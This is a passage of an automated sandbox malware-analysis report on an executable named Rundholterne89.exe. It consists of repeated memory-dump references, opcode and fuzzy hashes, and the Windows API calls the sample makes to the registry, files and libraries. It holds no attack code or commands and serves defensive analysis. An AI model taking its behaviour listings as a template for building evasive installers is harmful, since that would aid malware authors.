                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                            • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                            • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                            • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                            APIs
                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteOpenValue
                                                                                            • String ID:
                                                                                            • API String ID: 849931509-0
                                                                                            • Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                            • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                            • Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                            • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                            APIs
                                                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1938659011-0
                                                                                            • Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                                            • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                                            • Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                                            • Instruction Fuzzy Hash: 48F08231B05240DBDB20DF659D45A9B7FA8EFA1355B10443BF145F6191D2388542DB29
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                              • Part of subcall function 0040605A: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                              • Part of subcall function 0040605A: wsprintfA.USER32 ref: 004060AA
                                                                                              • Part of subcall function 0040605A: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                            • Instruction ID: 98ccb2102d83f5f685579eea27cf19d97b4e550a260e46f586538f412ce47dd7
                                                                                            • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                            • Instruction Fuzzy Hash: 19E08632644111ABD320A7749D0493B72A89E85740302483EF506F2181DB38DC21A669
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                            • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                            • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                            • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00405595,?,?,00000000,00405778,?,?,?,?), ref: 00405982
                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405996
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                            • Instruction ID: d845d86c17b980f18525549d7b015dd21524309b6d76b06211fdae883a44da1e
                                                                                            • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                                                                            • Instruction Fuzzy Hash: DED01272908121BFC2102728ED0C89FBF65EB543727018B31FDB9E22F0D7304C568AA6
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,00403102,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405491
                                                                                            • GetLastError.KERNEL32 ref: 0040549F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                            • Instruction ID: a4c09d903a68db5e1e5a8a61abb96ed160ccf8e5b17bdb7d1f8a9ed05c9a91ae
                                                                                            • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                            • Instruction Fuzzy Hash: 9FC04C30629541EADA515B209E097577E54AB50742F2045756606E10E0D6349551D92E
                                                                                            APIs
                                                                                            • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                            • Instruction ID: d438f0a484ed9c160f568b140fbb6a6f0821f4cba08bd088e2e240e06c4f75a3
                                                                                            • Opcode Fuzzy Hash: 08f437b6b575c0d1784f99ac72875e6d7de6160551833be987b148fec970e4e7
                                                                                            • Instruction Fuzzy Hash: 5FE04676240208AFDB00EFA9ED4AFA637ECBB18705F008425B609E60A1C678E5508B69
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040307A,00000000,00414420,000000FF,00414420,000000FF,000000FF,00000004,00000000), ref: 00405A5D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                            • Instruction ID: 4baa6dbb94b5aed14ede1987b2b874979685841cdf923a54f3be7db8892ddb6c
                                                                                            • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                                                            • Instruction Fuzzy Hash: 65E0EC3265425EAFDF109E659C40EEB7BACEB053A0F008933F925E2150D231E821DFA9
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030C4,00000000,00000000,00402EEE,000000FF,00000004,00000000,00000000,00000000), ref: 00405A2E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                            • Instruction ID: b949637607fe9c5fc006a161b6664aa16a088e5f06d71f7b71a40b2ab1c7b417
                                                                                            • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                                                            • Instruction Fuzzy Hash: 80E0EC3261425AABDF109E959C40FEB7B6CEF45360F048532F915E6590E231E8219FA9
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                            • Instruction ID: 6a3e57155666377f6ae5a5c5a230e2cf9c2db004969d7e98ca1d37c028e4fb03
                                                                                            • Opcode Fuzzy Hash: 458389e1991e1a908742f437881805813113f4244f4ccb02aaaba390b89fa544
                                                                                            • Instruction Fuzzy Hash: A2D05B33B14100DBDB10EBE5DF08A9D73A5BB60329B308637D201F21D1D7B9C9559B29
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 00403F72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                            • Instruction ID: 75b6af85c7b4550c46e72781509667ec0f8baecc0ee27a44b040c7e6c7b1aa08
                                                                                            • Opcode Fuzzy Hash: 1e62087203bf6f43f0c9384ee7a624a046e3022ab191d81d5448d2709a656daf
                                                                                            • Instruction Fuzzy Hash: 1FC04875B88201BAEE218B609D4AF167BA8AB60B42F258429B211E60E0C674F410DA2D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000028,?,00000001,00403D7A), ref: 00403F57
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                            • Instruction ID: 9ba269cb94747afcd00db45940492297b6475019a1e9eeef8f710f25602b24aa
                                                                                            • Opcode Fuzzy Hash: d71ad897c2f2d45ed447b95b395c8a164bb0c93204989444b513c5694a0ce339
                                                                                            • Instruction Fuzzy Hash: 71B01235684200BBFE325B00DE0DF457E62F768701F008034B300250F1C7B200A2DB29
                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 004030D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
